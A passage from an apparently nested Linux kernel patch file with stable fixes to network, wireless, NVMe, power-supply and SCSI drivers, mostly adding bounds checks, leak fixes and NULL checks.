+ 	mutex_lock(&phydev->lock);
++	old_state = phydev->state;
+ 
+ 	if (phydev->state == PHY_CABLETEST) {
+ 		phy_abort_cable_test(phydev);
+@@ -1112,6 +1126,7 @@ void phy_stop(struct phy_device *phydev)
+ 		sfp_upstream_stop(phydev->sfp_bus);
+ 
+ 	phydev->state = PHY_HALTED;
++	phy_process_state_change(phydev, old_state);
+ 
+ 	mutex_unlock(&phydev->lock);
+ 
+@@ -1229,13 +1244,7 @@ void phy_state_machine(struct work_struct *work)
+ 	if (err < 0)
+ 		phy_error(phydev);
+ 
+-	if (old_state != phydev->state) {
+-		phydev_dbg(phydev, "PHY state change %s -> %s\n",
+-			   phy_state_to_str(old_state),
+-			   phy_state_to_str(phydev->state));
+-		if (phydev->drv && phydev->drv->link_change_notify)
+-			phydev->drv->link_change_notify(phydev);
+-	}
++	phy_process_state_change(phydev, old_state);
+ 
+ 	/* Only re-schedule a PHY state machine change if we are polling the
+ 	 * PHY, if PHY_MAC_INTERRUPT is set, then we will be moving
+diff --git a/drivers/net/usb/asix_devices.c b/drivers/net/usb/asix_devices.c
+index 743cbf5d662c9..f7cff58fe0449 100644
+--- a/drivers/net/usb/asix_devices.c
++++ b/drivers/net/usb/asix_devices.c
+@@ -666,8 +666,9 @@ static int asix_resume(struct usb_interface *intf)
+ static int ax88772_init_mdio(struct usbnet *dev)
+ {
+ 	struct asix_common_private *priv = dev->driver_priv;
++	int ret;
+ 
+-	priv->mdio = devm_mdiobus_alloc(&dev->udev->dev);
++	priv->mdio = mdiobus_alloc();
+ 	if (!priv->mdio)
+ 		return -ENOMEM;
+ 
+@@ -679,7 +680,20 @@ static int ax88772_init_mdio(struct usbnet *dev)
+ 	snprintf(priv->mdio->id, MII_BUS_ID_SIZE, "usb-%03d:%03d",
+ 		 dev->udev->bus->busnum, dev->udev->devnum);
+ 
+-	return devm_mdiobus_register(&dev->udev->dev, priv->mdio);
++	ret = mdiobus_register(priv->mdio);
++	if (ret) {
++		netdev_err(dev->net, "Could not register MDIO bus (err %d)\n", ret);
++		mdiobus_free(priv->mdio);
++		priv->mdio = NULL;
++	}
++
++	return ret;
++}
++
++static void ax88772_mdio_unregister(struct asix_common_private *priv)
++{
++	mdiobus_unregister(priv->mdio);
++	mdiobus_free(priv->mdio);
+ }
+ 
+ static int ax88772_init_phy(struct usbnet *dev)
+@@ -896,16 +910,23 @@ static int ax88772_bind(struct usbnet *dev, struct usb_interface *intf)
+ 
+ 	ret = ax88772_init_mdio(dev);
+ 	if (ret)
+-		return ret;
++		goto mdio_err;
+ 
+ 	ret = ax88772_phylink_setup(dev);
+ 	if (ret)
+-		return ret;
++		goto phylink_err;
+ 
+ 	ret = ax88772_init_phy(dev);
+ 	if (ret)
+-		phylink_destroy(priv->phylink);
++		goto initphy_err;
+ 
++	return 0;
++
++initphy_err:
++	phylink_destroy(priv->phylink);
++phylink_err:
++	ax88772_mdio_unregister(priv);
++mdio_err:
+ 	return ret;
+ }
+ 
+@@ -926,6 +947,7 @@ static void ax88772_unbind(struct usbnet *dev, struct usb_interface *intf)
+ 	phylink_disconnect_phy(priv->phylink);
+ 	rtnl_unlock();
+ 	phylink_destroy(priv->phylink);
++	ax88772_mdio_unregister(priv);
+ 	asix_rx_fixup_common_free(dev->driver_priv);
+ }
+ 
+diff --git a/drivers/net/usb/cdc_mbim.c b/drivers/net/usb/cdc_mbim.c
+index c89639381eca3..cd4083e0b3b9e 100644
+--- a/drivers/net/usb/cdc_mbim.c
++++ b/drivers/net/usb/cdc_mbim.c
+@@ -665,6 +665,11 @@ static const struct usb_device_id mbim_devs[] = {
+ 	  .driver_info = (unsigned long)&cdc_mbim_info_avoid_altsetting_toggle,
+ 	},
+ 
++	/* Telit FE990 */
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x1bc7, 0x1081, USB_CLASS_COMM, USB_CDC_SUBCLASS_MBIM, USB_CDC_PROTO_NONE),
++	  .driver_info = (unsigned long)&cdc_mbim_info_avoid_altsetting_toggle,
++	},
++
+ 	/* default entry */
+ 	{ USB_INTERFACE_INFO(USB_CLASS_COMM, USB_CDC_SUBCLASS_MBIM, USB_CDC_PROTO_NONE),
+ 	  .driver_info = (unsigned long)&cdc_mbim_info_zlp,
+diff --git a/drivers/net/usb/lan78xx.c b/drivers/net/usb/lan78xx.c
+index 068488890d57b..c458c030fadf6 100644
+--- a/drivers/net/usb/lan78xx.c
++++ b/drivers/net/usb/lan78xx.c
+@@ -3579,13 +3579,29 @@ static int lan78xx_rx(struct lan78xx_net *dev, struct sk_buff *skb,
+ 		size = (rx_cmd_a & RX_CMD_A_LEN_MASK_);
+ 		align_count = (4 - ((size + RXW_PADDING) % 4)) % 4;
+ 
++		if (unlikely(size > skb->len)) {
++			netif_dbg(dev, rx_err, dev->net,
++				  "size err rx_cmd_a=0x%08x\n",
++				  rx_cmd_a);
++			return 0;
++		}
++
+ 		if (unlikely(rx_cmd_a & RX_CMD_A_RED_)) {
+ 			netif_dbg(dev, rx_err, dev->net,
+ 				  "Error rx_cmd_a=0x%08x", rx_cmd_a);
+ 		} else {
+-			u32 frame_len = size - ETH_FCS_LEN;
++			u32 frame_len;
+ 			struct sk_buff *skb2;
+ 
++			if (unlikely(size < ETH_FCS_LEN)) {
++				netif_dbg(dev, rx_err, dev->net,
++					  "size err rx_cmd_a=0x%08x\n",
++					  rx_cmd_a);
++				return 0;
++			}
++
++			frame_len = size - ETH_FCS_LEN;
++
+ 			skb2 = napi_alloc_skb(&dev->napi, frame_len);
+ 			if (!skb2)
+ 				return 0;
+diff --git a/drivers/net/usb/qmi_wwan.c b/drivers/net/usb/qmi_wwan.c
+index a808d718c0123..571e37e67f9ce 100644
+--- a/drivers/net/usb/qmi_wwan.c
++++ b/drivers/net/usb/qmi_wwan.c
+@@ -1364,6 +1364,7 @@ static const struct usb_device_id products[] = {
+ 	{QMI_QUIRK_SET_DTR(0x1bc7, 0x1057, 2)},	/* Telit FN980 */
+ 	{QMI_QUIRK_SET_DTR(0x1bc7, 0x1060, 2)},	/* Telit LN920 */
+ 	{QMI_QUIRK_SET_DTR(0x1bc7, 0x1070, 2)},	/* Telit FN990 */
++	{QMI_QUIRK_SET_DTR(0x1bc7, 0x1080, 2)}, /* Telit FE990 */
+ 	{QMI_FIXED_INTF(0x1bc7, 0x1100, 3)},	/* Telit ME910 */
+ 	{QMI_FIXED_INTF(0x1bc7, 0x1101, 3)},	/* Telit ME910 dual modem */
+ 	{QMI_FIXED_INTF(0x1bc7, 0x1200, 5)},	/* Telit LE920 */
+diff --git a/drivers/net/usb/smsc95xx.c b/drivers/net/usb/smsc95xx.c
+index 32d2c60d334dc..563ecd27b93ea 100644
+--- a/drivers/net/usb/smsc95xx.c
++++ b/drivers/net/usb/smsc95xx.c
+@@ -1833,6 +1833,12 @@ static int smsc95xx_rx_fixup(struct usbnet *dev, struct sk_buff *skb)
+ 		size = (u16)((header & RX_STS_FL_) >> 16);
+ 		align_count = (4 - ((size + NET_IP_ALIGN) % 4)) % 4;
+ 
++		if (unlikely(size > skb->len)) {
++			netif_dbg(dev, rx_err, dev->net,
++				  "size err header=0x%08x\n", header);
++			return 0;
++		}
++
+ 		if (unlikely(header & RX_STS_ES_)) {
+ 			netif_dbg(dev, rx_err, dev->net,
+ 				  "Error header=0x%08x\n", header);
+diff --git a/drivers/net/wireguard/queueing.h b/drivers/net/wireguard/queueing.h
+index 583adb37ee1e3..125284b346a77 100644
+--- a/drivers/net/wireguard/queueing.h
++++ b/drivers/net/wireguard/queueing.h
+@@ -106,7 +106,7 @@ static inline int wg_cpumask_choose_online(int *stored_cpu, unsigned int id)
+ {
+ 	unsigned int cpu = *stored_cpu, cpu_index, i;
+ 
+-	if (unlikely(cpu == nr_cpumask_bits ||
++	if (unlikely(cpu >= nr_cpu_ids ||
+ 		     !cpumask_test_cpu(cpu, cpu_online_mask))) {
+ 		cpu_index = id % cpumask_weight(cpu_online_mask);
+ 		cpu = cpumask_first(cpu_online_mask);
+diff --git a/drivers/net/wireless/mediatek/mt76/mac80211.c b/drivers/net/wireless/mediatek/mt76/mac80211.c
+index fc608b369b3cc..d75e999a80e1f 100644
+--- a/drivers/net/wireless/mediatek/mt76/mac80211.c
++++ b/drivers/net/wireless/mediatek/mt76/mac80211.c
+@@ -526,6 +526,7 @@ int mt76_register_phy(struct mt76_phy *phy, bool vht,
+ 	if (ret)
+ 		return ret;
+ 
++	set_bit(MT76_STATE_REGISTERED, &phy->state);
+ 	phy->dev->phys[phy->band_idx] = phy;
+ 
+ 	return 0;
+@@ -536,6 +537,9 @@ void mt76_unregister_phy(struct mt76_phy *phy)
+ {
+ 	struct mt76_dev *dev = phy->dev;
+ 
++	if (!test_bit(MT76_STATE_REGISTERED, &phy->state))
++		return;
++
+ 	mt76_tx_status_check(dev, true);
+ 	ieee80211_unregister_hw(phy->hw);
+ 	dev->phys[phy->band_idx] = NULL;
+@@ -663,6 +667,7 @@ int mt76_register_device(struct mt76_dev *dev, bool vht,
+ 		return ret;
+ 
+ 	WARN_ON(mt76_worker_setup(hw, &dev->tx_worker, NULL, "tx"));
++	set_bit(MT76_STATE_REGISTERED, &phy->state);
+ 	sched_set_fifo_low(dev->tx_worker.task);
+ 
+ 	return 0;
+@@ -673,6 +678,9 @@ void mt76_unregister_device(struct mt76_dev *dev)
+ {
+ 	struct ieee80211_hw *hw = dev->hw;
+ 
++	if (!test_bit(MT76_STATE_REGISTERED, &dev->phy.state))
++		return;
++
+ 	if (IS_ENABLED(CONFIG_MT76_LEDS))
+ 		mt76_led_cleanup(dev);
+ 	mt76_tx_status_check(dev, true);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76.h b/drivers/net/wireless/mediatek/mt76/mt76.h
+index 32a77a0ae9da9..d8216243b0224 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76.h
++++ b/drivers/net/wireless/mediatek/mt76/mt76.h
+@@ -399,6 +399,7 @@ struct mt76_tx_cb {
+ 
+ enum {
+ 	MT76_STATE_INITIALIZED,
++	MT76_STATE_REGISTERED,
+ 	MT76_STATE_RUNNING,
+ 	MT76_STATE_MCU_RUNNING,
+ 	MT76_SCANNING,
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c b/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c
+index 5a047e630860f..d106cbfc387c8 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c
++++ b/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c
+@@ -1221,6 +1221,9 @@ EXPORT_SYMBOL_GPL(mt76_connac_mcu_sta_ba_tlv);
+ 
+ int mt76_connac_mcu_sta_wed_update(struct mt76_dev *dev, struct sk_buff *skb)
+ {
++	if (!mt76_is_mmio(dev))
++		return 0;
++
+ 	if (!mtk_wed_device_active(&dev->mmio.wed))
+ 		return 0;
+ 
+diff --git a/drivers/nvme/host/ioctl.c b/drivers/nvme/host/ioctl.c
+index 06f52db34be9b..3a6f41a45f9bc 100644
+--- a/drivers/nvme/host/ioctl.c
++++ b/drivers/nvme/host/ioctl.c
+@@ -463,7 +463,8 @@ static inline struct nvme_uring_cmd_pdu *nvme_uring_cmd_pdu(
+ 	return (struct nvme_uring_cmd_pdu *)&ioucmd->pdu;
+ }
+ 
+-static void nvme_uring_task_meta_cb(struct io_uring_cmd *ioucmd)
++static void nvme_uring_task_meta_cb(struct io_uring_cmd *ioucmd,
++				    unsigned issue_flags)
+ {
+ 	struct nvme_uring_cmd_pdu *pdu = nvme_uring_cmd_pdu(ioucmd);
+ 	struct request *req = pdu->req;
+@@ -484,17 +485,18 @@ static void nvme_uring_task_meta_cb(struct io_uring_cmd *ioucmd)
+ 		blk_rq_unmap_user(req->bio);
+ 	blk_mq_free_request(req);
+ 
+-	io_uring_cmd_done(ioucmd, status, result);
++	io_uring_cmd_done(ioucmd, status, result, issue_flags);
+ }
+ 
+-static void nvme_uring_task_cb(struct io_uring_cmd *ioucmd)
++static void nvme_uring_task_cb(struct io_uring_cmd *ioucmd,
++			       unsigned issue_flags)
+ {
+ 	struct nvme_uring_cmd_pdu *pdu = nvme_uring_cmd_pdu(ioucmd);
+ 
+ 	if (pdu->bio)
+ 		blk_rq_unmap_user(pdu->bio);
+ 
+-	io_uring_cmd_done(ioucmd, pdu->nvme_status, pdu->u.result);
++	io_uring_cmd_done(ioucmd, pdu->nvme_status, pdu->u.result, issue_flags);
+ }
+ 
+ static enum rq_end_io_ret nvme_uring_cmd_end_io(struct request *req,
+@@ -516,7 +518,7 @@ static enum rq_end_io_ret nvme_uring_cmd_end_io(struct request *req,
+ 	 * Otherwise, move the completion to task work.
+ 	 */
+ 	if (cookie != NULL && blk_rq_is_poll(req))
+-		nvme_uring_task_cb(ioucmd);
++		nvme_uring_task_cb(ioucmd, IO_URING_F_UNLOCKED);
+ 	else
+ 		io_uring_cmd_complete_in_task(ioucmd, nvme_uring_task_cb);
+ 
+@@ -538,7 +540,7 @@ static enum rq_end_io_ret nvme_uring_cmd_end_io_meta(struct request *req,
+ 	 * Otherwise, move the completion to task work.
+ 	 */
+ 	if (cookie != NULL && blk_rq_is_poll(req))
+-		nvme_uring_task_meta_cb(ioucmd);
++		nvme_uring_task_meta_cb(ioucmd, IO_URING_F_UNLOCKED);
+ 	else
+ 		io_uring_cmd_complete_in_task(ioucmd, nvme_uring_task_meta_cb);
+ 
+diff --git a/drivers/platform/chrome/cros_ec_chardev.c b/drivers/platform/chrome/cros_ec_chardev.c
+index 0de7c255254e0..d6de5a2941282 100644
+--- a/drivers/platform/chrome/cros_ec_chardev.c
++++ b/drivers/platform/chrome/cros_ec_chardev.c
+@@ -284,7 +284,7 @@ static long cros_ec_chardev_ioctl_xcmd(struct cros_ec_dev *ec, void __user *arg)
+ 	    u_cmd.insize > EC_MAX_MSG_BYTES)
+ 		return -EINVAL;
+ 
+-	s_cmd = kmalloc(sizeof(*s_cmd) + max(u_cmd.outsize, u_cmd.insize),
++	s_cmd = kzalloc(sizeof(*s_cmd) + max(u_cmd.outsize, u_cmd.insize),
+ 			GFP_KERNEL);
+ 	if (!s_cmd)
+ 		return -ENOMEM;
+diff --git a/drivers/platform/x86/intel/int3472/tps68470_board_data.c b/drivers/platform/x86/intel/int3472/tps68470_board_data.c
+index 309eab9c05588..322237e056f32 100644
+--- a/drivers/platform/x86/intel/int3472/tps68470_board_data.c
++++ b/drivers/platform/x86/intel/int3472/tps68470_board_data.c
+@@ -159,9 +159,10 @@ static const struct int3472_tps68470_board_data surface_go_tps68470_board_data =
+ static const struct int3472_tps68470_board_data surface_go3_tps68470_board_data = {
+ 	.dev_name = "i2c-INT3472:01",
+ 	.tps68470_regulator_pdata = &surface_go_tps68470_pdata,
+-	.n_gpiod_lookups = 1,
++	.n_gpiod_lookups = 2,
+ 	.tps68470_gpio_lookup_tables = {
+-		&surface_go_int347a_gpios
++		&surface_go_int347a_gpios,
++		&surface_go_int347e_gpios,
+ 	},
+ };
+ 
+diff --git a/drivers/power/supply/bq24190_charger.c b/drivers/power/supply/bq24190_charger.c
+index 2b2c3a4391c19..6bd711932e06d 100644
+--- a/drivers/power/supply/bq24190_charger.c
++++ b/drivers/power/supply/bq24190_charger.c
+@@ -1906,6 +1906,7 @@ static void bq24190_remove(struct i2c_client *client)
+ 	struct bq24190_dev_info *bdi = i2c_get_clientdata(client);
+ 	int error;
+ 
++	cancel_delayed_work_sync(&bdi->input_current_limit_work);
+ 	error = pm_runtime_resume_and_get(bdi->dev);
+ 	if (error < 0)
+ 		dev_warn(bdi->dev, "pm_runtime_get failed: %i\n", error);
+diff --git a/drivers/power/supply/da9150-charger.c b/drivers/power/supply/da9150-charger.c
+index f9314cc0cd75f..6b987da586556 100644
+--- a/drivers/power/supply/da9150-charger.c
++++ b/drivers/power/supply/da9150-charger.c
+@@ -662,6 +662,7 @@ static int da9150_charger_remove(struct platform_device *pdev)
+ 
+ 	if (!IS_ERR_OR_NULL(charger->usb_phy))
+ 		usb_unregister_notifier(charger->usb_phy, &charger->otg_nb);
++	cancel_work_sync(&charger->otg_work);
+ 
+ 	power_supply_unregister(charger->battery);
+ 	power_supply_unregister(charger->usb);
+diff --git a/drivers/scsi/device_handler/scsi_dh_alua.c b/drivers/scsi/device_handler/scsi_dh_alua.c
+index 29a2865b8e2e1..e436eaa3a9071 100644
+--- a/drivers/scsi/device_handler/scsi_dh_alua.c
++++ b/drivers/scsi/device_handler/scsi_dh_alua.c
+@@ -1139,10 +1139,12 @@ static int alua_activate(struct scsi_device *sdev,
+ 	rcu_read_unlock();
+ 	mutex_unlock(&h->init_mutex);
+ 
+-	if (alua_rtpg_queue(pg, sdev, qdata, true))
++	if (alua_rtpg_queue(pg, sdev, qdata, true)) {
+ 		fn = NULL;
+-	else
++	} else {
++		kfree(qdata);
+ 		err = SCSI_DH_DEV_OFFLINED;
++	}
+ 	kref_put(&pg->kref, release_port_group);
+ out:
+ 	if (fn)
+diff --git a/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c b/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
+index 0c3fcb8078062..a63279f55d096 100644
+--- a/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
++++ b/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
+@@ -2495,8 +2495,7 @@ static int interrupt_preinit_v3_hw(struct hisi_hba *hisi_hba)
+ 	hisi_hba->cq_nvecs = vectors - BASE_VECTORS_V3_HW;
+ 	shost->nr_hw_queues = hisi_hba->cq_nvecs;
+ 
+-	devm_add_action(&pdev->dev, hisi_sas_v3_free_vectors, pdev);
+-	return 0;
++	return devm_add_action(&pdev->dev, hisi_sas_v3_free_vectors, pdev);
+ }
+ 
+ static int interrupt_init_v3_hw(struct hisi_hba *hisi_hba)
+diff --git a/drivers/scsi/lpfc/lpfc_init.c b/drivers/scsi/lpfc/lpfc_init.c
+index 25ba20e428255..eeb73da754d0d 100644
+--- a/drivers/scsi/lpfc/lpfc_init.c
++++ b/drivers/scsi/lpfc/lpfc_init.c
+@@ -7235,6 +7235,8 @@ lpfc_sli4_cgn_params_read(struct lpfc_hba *phba)
+ 	/* Find out if the FW has a new set of congestion parameters. */
+ 	len = sizeof(struct lpfc_cgn_param);
+ 	pdata = kzalloc(len, GFP_KERNEL);
++	if (!pdata)
++		return -ENOMEM;
+ 	ret = lpfc_read_object(phba, (char *)LPFC_PORT_CFG_NAME,
+ 			       pdata, len);
+ 
+@@ -12507,7 +12509,7 @@ lpfc_cpu_affinity_check(struct lpfc_hba *phba, int vectors)
+ 					goto found_same;
+ 				new_cpu = cpumask_next(
+ 					new_cpu, cpu_present_mask);
+-				if (new_cpu == nr_cpumask_bits)
++				if (new_cpu >= nr_cpu_ids)
+ 					new_cpu = first_cpu;
+ 			}
+ 			/* At this point, we leave the CPU as unassigned */
+@@ -12521,7 +12523,7 @@ found_same:
+ 			 * selecting the same IRQ.
+ 			 */
+ 			start_cpu = cpumask_next(new_cpu, cpu_present_mask);
+-			if (start_cpu == nr_cpumask_bits)
++			if (start_cpu >= nr_cpu_ids)
+ 				start_cpu = first_cpu;
+ 
+ 			lpfc_printf_log(phba, KERN_INFO, LOG_INIT,
+@@ -12557,7 +12559,7 @@ found_same:
+ 					goto found_any;
+ 				new_cpu = cpumask_next(
+ 					new_cpu, cpu_present_mask);
+-				if (new_cpu == nr_cpumask_bits)
++				if (new_cpu >= nr_cpu_ids)
+ 					new_cpu = first_cpu;
+ 			}
+ 			/* We should never leave an entry unassigned */
+@@ -12575,7 +12577,7 @@ found_any:
+ 			 * selecting the same IRQ.
+ 			 */
+ 			start_cpu = cpumask_next(new_cpu, cpu_present_mask);
+-			if (start_cpu == nr_cpumask_bits)
++			if (start_cpu >= nr_cpu_ids)
+ 				start_cpu = first_cpu;
+ 
+ 			lpfc_printf_log(phba, KERN_INFO, LOG_INIT,
+@@ -12648,7 +12650,7 @@ found_any:
+ 				goto found_hdwq;
+ 			}
+ 			new_cpu = cpumask_next(new_cpu, cpu_present_mask);
+-			if (new_cpu == nr_cpumask_bits)
++			if (new_cpu >= nr_cpu_ids)
+ 				new_cpu = first_cpu;
+ 		}
+ 
+@@ -12663,7 +12665,7 @@ found_any:
+ 				goto found_hdwq;
+ 
+ 			new_cpu = cpumask_next(new_cpu, cpu_present_mask);
+-			if (new_cpu == nr_cpumask_bits)
++			if (new_cpu >= nr_cpu_ids)
+ 				new_cpu = first_cpu;
+ 		}
+ 
+@@ -12674,7 +12676,7 @@ found_any:
+  found_hdwq:
+ 		/* We found an available entry, copy the IRQ info */
+ 		start_cpu = cpumask_next(new_cpu, cpu_present_mask);
+-		if (start_cpu == nr_cpumask_bits)
++		if (start_cpu >= nr_cpu_ids)
+ 			start_cpu = first_cpu;
+ 		cpup->hdwq = new_cpup->hdwq;
+  logit:
+diff --git a/drivers/scsi/lpfc/lpfc_sli.c b/drivers/scsi/lpfc/lpfc_sli.c
+index 55a0d4013439f..c0ddf55676a1f 100644
+--- a/drivers/scsi/lpfc/lpfc_sli.c
++++ b/drivers/scsi/lpfc/lpfc_sli.c
+@@ -21903,20 +21903,20 @@ lpfc_get_io_buf_from_private_pool(struct lpfc_hba *phba,
+ static struct lpfc_io_buf *
+ lpfc_get_io_buf_from_expedite_pool(struct lpfc_hba *phba)
+ {
+-	struct lpfc_io_buf *lpfc_ncmd;
++	struct lpfc_io_buf *lpfc_ncmd = NULL, *iter;
+ 	struct lpfc_io_buf *lpfc_ncmd_next;
+ 	unsigned long iflag;
+ 	struct lpfc_epd_pool *epd_pool;
+ 
+ 	epd_pool = &phba->epd_pool;
+-	lpfc_ncmd = NULL;
+ 
+ 	spin_lock_irqsave(&epd_pool->lock, iflag);
+ 	if (epd_pool->count > 0) {
+-		list_for_each_entry_safe(lpfc_ncmd, lpfc_ncmd_next,
++		list_for_each_entry_safe(iter, lpfc_ncmd_next,
+ 					 &epd_pool->list, list) {
+-			list_del(&lpfc_ncmd->list);
++			list_del(&iter->list);
+ 			epd_pool->count--;
++			lpfc_ncmd = iter;
+ 			break;
+ 		}
+ 	}
+@@ -22113,10 +22113,6 @@ lpfc_read_object(struct lpfc_hba *phba, char *rdobject, uint32_t *datap,
+ 	struct lpfc_dmabuf *pcmd;
+ 	u32 rd_object_name[LPFC_MBX_OBJECT_NAME_LEN_DW] = {0};
+ 
+-	/* sanity check on queue memory */
+-	if (!datap)
+-		return -ENODEV;
+-
+ 	mbox = mempool_alloc(phba->mbox_mem_pool, GFP_KERNEL);
+ 	if (!mbox)
+ 		return -ENOMEM;
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_app.c b/drivers/scsi/mpi3mr/mpi3mr_app.c
+index bff6377023979..d10c6afb7f9cd 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_app.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_app.c
+@@ -886,7 +886,7 @@ static int mpi3mr_build_nvme_prp(struct mpi3mr_ioc *mrioc,
+ 			 * each time through the loop.
+ 			 */
+ 			*prp_entry = cpu_to_le64(dma_addr);
+-			if (*prp1_entry & sgemod_mask) {
++			if (*prp_entry & sgemod_mask) {
+ 				dprint_bsg_err(mrioc,
+ 				    "%s: PRP address collides with SGE modifier\n",
+ 				    __func__);
+@@ -895,7 +895,7 @@ static int mpi3mr_build_nvme_prp(struct mpi3mr_ioc *mrioc,
+ 			*prp_entry &= ~sgemod_mask;
+ 			*prp_entry |= sgemod_val;
+ 			prp_entry++;
+-			prp_entry_dma++;
++			prp_entry_dma += prp_size;
+ 		}
+ 
+ 		/*
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_fw.c b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+index 28fd90c4b62d0..a565817aa56d4 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_fw.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+@@ -1198,7 +1198,7 @@ mpi3mr_revalidate_factsdata(struct mpi3mr_ioc *mrioc)
+  */
+ static int mpi3mr_bring_ioc_ready(struct mpi3mr_ioc *mrioc)
+ {
+-	u32 ioc_config, ioc_status, timeout;
++	u32 ioc_config, ioc_status, timeout, host_diagnostic;
+ 	int retval = 0;
+ 	enum mpi3mr_iocstate ioc_state;
+ 	u64 base_info;
+@@ -1252,6 +1252,23 @@ static int mpi3mr_bring_ioc_ready(struct mpi3mr_ioc *mrioc)
+ 			    retval, mpi3mr_iocstate_name(ioc_state));
+ 	}
+ 	if (ioc_state != MRIOC_STATE_RESET) {
++		if (ioc_state == MRIOC_STATE_FAULT) {
++			timeout = MPI3_SYSIF_DIAG_SAVE_TIMEOUT * 10;
++			mpi3mr_print_fault_info(mrioc);
++			do {
++				host_diagnostic =
++					readl(&mrioc->sysif_regs->host_diagnostic);
++				if (!(host_diagnostic &
++				      MPI3_SYSIF_HOST_DIAG_SAVE_IN_PROGRESS))
++					break;
++				if (!pci_device_is_present(mrioc->pdev)) {
++					mrioc->unrecoverable = 1;
++					ioc_err(mrioc, "controller is not present at the bringup\n");
++					goto out_device_not_present;
++				}
++				msleep(100);
++			} while (--timeout);
++		}
+ 		mpi3mr_print_fault_info(mrioc);
+ 		ioc_info(mrioc, "issuing soft reset to bring to reset state\n");
+ 		retval = mpi3mr_issue_reset(mrioc,
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_transport.c b/drivers/scsi/mpi3mr/mpi3mr_transport.c
+index 50263ba4f8428..5748bd9369ff7 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_transport.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_transport.c
+@@ -1549,7 +1549,8 @@ static void mpi3mr_sas_port_remove(struct mpi3mr_ioc *mrioc, u64 sas_address,
+ 
+ 	list_for_each_entry_safe(mr_sas_phy, next_phy,
+ 	    &mr_sas_port->phy_list, port_siblings) {
+-		if ((mrioc->logging_level & MPI3_DEBUG_TRANSPORT_INFO))
++		if ((!mrioc->stop_drv_processing) &&
++		    (mrioc->logging_level & MPI3_DEBUG_TRANSPORT_INFO))
+ 			dev_info(&mr_sas_port->port->dev,
+ 			    "remove: sas_address(0x%016llx), phy(%d)\n",
+ 			    (unsigned long long)
+@@ -2354,15 +2355,16 @@ int mpi3mr_report_tgtdev_to_sas_transport(struct mpi3mr_ioc *mrioc,
+ 	tgtdev->host_exposed = 1;
+ 	if (!mpi3mr_sas_port_add(mrioc, tgtdev->dev_handle,
+ 	    sas_address_parent, hba_port)) {
+-		tgtdev->host_exposed = 0;
+ 		retval = -1;
+-	} else if ((!tgtdev->starget)) {
+-		if (!mrioc->is_driver_loading)
++		} else if ((!tgtdev->starget) && (!mrioc->is_driver_loading)) {
+ 			mpi3mr_sas_port_remove(mrioc, sas_address,
+ 			    sas_address_parent, hba_port);
+-		tgtdev->host_exposed = 0;
+ 		retval = -1;
+ 	}
++	if (retval) {
++		tgtdev->dev_spec.sas_sata_inf.hba_port = NULL;
++		tgtdev->host_exposed = 0;
++	}
+ 	return retval;
+ }
+ 
+@@ -2391,6 +2393,7 @@ void mpi3mr_remove_tgtdev_from_sas_transport(struct mpi3mr_ioc *mrioc,
+ 	mpi3mr_sas_port_remove(mrioc, sas_address, sas_address_parent,
+ 	    hba_port);
+ 	tgtdev->host_exposed = 0;
++	tgtdev->dev_spec.sas_sata_inf.hba_port = NULL;
+ }
+ 
+ /**
+@@ -2447,7 +2450,7 @@ static u8 mpi3mr_get_port_id_by_rphy(struct mpi3mr_ioc *mrioc, struct sas_rphy *
+ 
+ 		tgtdev = __mpi3mr_get_tgtdev_by_addr_and_rphy(mrioc,
+ 			    rphy->identify.sas_address, rphy);
+-		if (tgtdev) {
++		if (tgtdev && tgtdev->dev_spec.sas_sata_inf.hba_port) {
+ 			port_id =
+ 				tgtdev->dev_spec.sas_sata_inf.hba_port->port_id;
+ 			mpi3mr_tgtdev_put(tgtdev);
+diff --git a/drivers/scsi/qla2xxx/qla_gbl.h b/drivers/scsi/qla2xxx/qla_gbl.h
+index e3256e721be14..ee54207fc5319 100644
+--- a/drivers/scsi/qla2xxx/qla_gbl.h
++++ b/drivers/scsi/qla2xxx/qla_gbl.h
+@@ -192,6 +192,7 @@ extern int ql2xsecenable;
+ extern int ql2xenforce_iocb_limit;
+ extern int ql2xabts_wait_nvme;
+ extern u32 ql2xnvme_queues;
++extern int ql2xfc2target;
+ 
+ extern int qla2x00_loop_reset(scsi_qla_host_t *);
+ extern void qla2x00_abort_all_cmds(scsi_qla_host_t *, int);
+diff --git a/drivers/scsi/qla2xxx/qla_init.c b/drivers/scsi/qla2xxx/qla_init.c
+index 8f2a968793913..d506eb3a9b639 100644
+--- a/drivers/scsi/qla2xxx/qla_init.c
++++ b/drivers/scsi/qla2xxx/qla_init.c
+@@ -1841,7 +1841,8 @@ void qla2x00_handle_rscn(scsi_qla_host_t *vha, struct event_arg *ea)
+ 	case RSCN_PORT_ADDR:
+ 		fcport = qla2x00_find_fcport_by_nportid(vha, &ea->id, 1);
+ 		if (fcport) {
+-			if (fcport->flags & FCF_FCP2_DEVICE &&
++			if (ql2xfc2target &&
++			    fcport->flags & FCF_FCP2_DEVICE &&
+ 			    atomic_read(&fcport->state) == FCS_ONLINE) {
+ 				ql_dbg(ql_dbg_disc, vha, 0x2115,
+ 				       "Delaying session delete for FCP2 portid=%06x %8phC ",
+diff --git a/drivers/scsi/qla2xxx/qla_isr.c b/drivers/scsi/qla2xxx/qla_isr.c
+index cbbd7014da939..86928a762a7a6 100644
+--- a/drivers/scsi/qla2xxx/qla_isr.c
++++ b/drivers/scsi/qla2xxx/qla_isr.c
+@@ -1900,6 +1900,8 @@ qla2x00_get_sp_from_handle(scsi_qla_host_t *vha, const char *func,
+ 	}
+ 
+ 	req->outstanding_cmds[index] = NULL;
++
